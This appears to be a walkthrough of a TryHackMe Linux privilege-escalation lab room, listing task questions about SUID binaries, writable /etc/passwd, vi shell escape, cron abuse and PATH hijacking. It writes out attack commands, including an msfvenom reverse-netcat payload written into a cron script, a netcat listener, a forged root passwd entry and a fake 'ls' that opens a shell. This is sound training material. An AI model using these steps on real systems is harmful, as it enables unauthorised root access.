THM | Common Linux Privesc

October 14, 2022 · 6 min read

Shells and Privilege Escalation | Common Linux Privesc | Summary:

Disclaimer: Please note that this write-up is NOT intended to replace the original room or its content, but rather serve as supplementary material for those who are stuck and need additional guidance.

Task | 01 | Get Connected

Question 1: Deploy the machine

Task | 02 | Understanding Privesc

Question 1: Read the information about privilege escalation

Task | 03 | Direction of Privilege Escalation

Question 1: Understand the difference between Horizontal and Vertical privilege escalation.

Task | 04 | Enumeration

Question 1*: First, lets SSH into the target machine, using the credentials user3:password. This is to simulate getting a foothold on the system as a normal privilege user.

Question 2: What is the target's hostname?

Question 3: Look at the output of /etc/passwd how many user[x] are there on the system?

Question 4: How many available shells are there on the system?

Question 5: What is the name of the bash script that is set to run every 5 minutes by cron?

Question 6: What critical file has had its permissions changed to allow some users to write to it?

Question 7: Well done! Bear the results of the enumeration stage in mind as we continue to exploit the system!

Task | 05 | Abusing SUID/GUID Files

Question 1: What is the path of the file in user3's directory that stands out to you?

Question 2: We know that "shell" is an SUID bit file, therefore running it will run the script as a root user! Lets run it! We can do this by running: ./shell

Question 3: Congratulations! You should now have a shell as root user, well done!

Task | 06 | Exploiting Writeable /etc/passwd

Question 1: First, let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user7, with the password "password"

Question 2: Having read the information above, what direction privilege escalation is this attack?

Question 3: Before we add our new user, we first need to create a compliant password hash to add! We do this by using the command: openssl passwd -1 -salt [salt] [password]. What is the hash created by using this command with the salt, "new" and the password "123"?

Question 4: Great! Now we need to take this value, and create a new root user account. What would the /etc/passwd entry look like for a root user with the username "new" and the password hash we created before?

Question 5: Great! Now you've got everything you need. Just add that entry to the end of the /etc/passwd file!

Question 6: Now, use "su" to login as the "new" account, and then enter the password. If you've done everything correctly- you should be greeted by a root prompt! Congratulations!

Task | 07 | Escaping Vi Editor

Question 1: First, let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user8, with the password "password"

Question 2: Let's use the sudo -l command, what does this user require (or not require) to run vi as root?

Question 3: So, all we need to do is open vi as root, by typing sudo vi into the terminal.

Question 4: Now, type :!sh to open a shell!

Task | 08 | Exploiting Crontab

Question 1: First, let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user4, with the password "password"

Question 2: Now, on our host machine- let's create a payload for our cron exploit using msfvenom.

Question 3: What is the flag to specify a payload in msfvenom?

Question 4: Create a payload using: msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R

Question 5: What directory is the "autoscript.sh" under?

Question 6: Lets replace the contents of the file with our payload using: echo [MSFVENOM OUTPUT] > autoscript.sh

Question 7: After copying the code into autoscript.sh file we wait for cron to execute the file, and start our netcat listener using: nc -lvnp 8888 and wait for our shell to land!

Question 8: After about 5 minutes, you should have a shell as root land in your netcat listening session! Congratulations!

Task | 09 | Exploiting PATH Variable

Question 1: Going back to our local ssh session, not the netcat root session, you can close that now, let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user5, with the password "password"

Question 2: Let's go to user5's home directory, and run the file "script". What command do we think that it's executing?

Question 3: Now we know what command to imitate, let's change directory to "tmp".

Question 4: Now we're inside tmp, let's create an imitation executable. The format for what we want to do is: echo "[whatever command we want to run]" > [name of the executable we're imitating]. What would the command look like to open a bash shell, writing to a file with the name of the executable we're imitating

Question 5: Great! Now we've made our imitation, we need to make it an executable. What command do we execute to do this?

Question 6: Now, we need to change the PATH variable, so that it points to the directory where we have our imitation "ls" stored! We do this using the command export PATH=/tmp:$PATH.

Note, this will cause you to open a bash prompt every time you use "ls". If you need to use "ls" before you finish the exploit, use "/bin/ls" where the real "ls" executable is.
Once you've finished the exploit, you can exit out of root and use export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$PATH to reset the PATH variable back to default, letting you use "ls" again!

Question 7: Now, change directory back to user5's home directory.

Question 8: Now, run the "script" file again, you should be sent into a root bash prompt! Congratulations!

Task | 10 | Expanding Your Knowledge

Question 1: Well done, you did it!

Shells and Privilege Escalation | Common Linux Privesc | Summary:​

Task | 01 | Get Connected​

Task | 02 | Understanding Privesc​

Task | 03 | Direction of Privilege Escalation​

Task | 04 | Enumeration​

Task | 05 | Abusing SUID/GUID Files​

Task | 06 | Exploiting Writeable /etc/passwd​

Task | 07 | Escaping Vi Editor​

Task | 08 | Exploiting Crontab​

Task | 09 | Exploiting PATH Variable​

Task | 10 | Expanding Your Knowledge​